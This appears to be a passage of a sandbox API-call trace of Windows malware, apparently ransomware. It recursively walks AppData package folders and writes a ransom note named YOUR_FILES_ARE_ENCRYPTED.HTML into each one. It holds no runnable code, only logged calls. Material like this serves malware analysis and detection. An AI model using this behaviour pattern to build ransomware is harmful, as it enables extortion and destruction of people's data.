[0116.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.574] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 1 [0116.574] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 0 [0116.574] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.574] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0116.574] GetProcessHeap () returned 0x600000 [0116.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.574] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.575] CloseHandle (hObject=0x214) returned 1 [0116.575] GetProcessHeap () returned 0x600000 [0116.575] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.576] GetProcessHeap () returned 0x600000 [0116.576] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.576] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.576] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.576] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp") returned 105 [0116.576] GetProcessHeap () returned 0x600000 [0116.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.576] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp" [0116.576] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.576] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 1 [0116.576] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 0 [0116.576] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.576] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.576] GetProcessHeap () returned 0x600000 [0116.576] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.576] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.577] CloseHandle (hObject=0x214) returned 1 [0116.577] GetProcessHeap () returned 0x600000 [0116.577] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.577] GetProcessHeap () returned 0x600000 [0116.578] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.578] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.578] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0116.578] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0116.578] GetProcessHeap () returned 0x600000 [0116.578] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.579] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.580] CloseHandle (hObject=0x320) returned 1 [0116.580] GetProcessHeap () returned 0x600000 [0116.580] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.580] GetProcessHeap () returned 0x600000 [0116.580] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.581] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d4ba95, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d4ba95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.581] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.581] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData") returned 105 [0116.581] GetProcessHeap () returned 0x600000 [0116.581] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.582] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData" [0116.582] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData\\*" [0116.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d4ba95, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d4ba95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.582] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d4ba95, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d4ba95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.582] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7d4ba95, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d4ba95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 0 [0116.582] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.582] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.582] GetProcessHeap () returned 0x600000 [0116.582] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.583] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.592] CloseHandle (hObject=0x320) returned 1 [0116.592] GetProcessHeap () returned 0x600000 [0116.592] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.592] GetProcessHeap () returned 0x600000 [0116.592] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.593] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.593] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.593] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache") returned 108 [0116.593] GetProcessHeap () returned 0x600000 [0116.593] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.594] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache" [0116.594] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache\\*" [0116.594] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0116.594] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.594] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 0 [0116.594] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0116.595] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.595] GetProcessHeap () returned 0x600000 [0116.595] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.596] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.597] CloseHandle (hObject=0x320) returned 1 [0116.597] GetProcessHeap () returned 0x600000 [0116.597] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.597] GetProcessHeap () returned 0x600000 [0116.597] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.598] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.598] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.598] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState") returned 108 [0116.598] GetProcessHeap () returned 0x600000 [0116.598] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.599] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState" [0116.599] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState\\*" [0116.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.600] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.600] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, 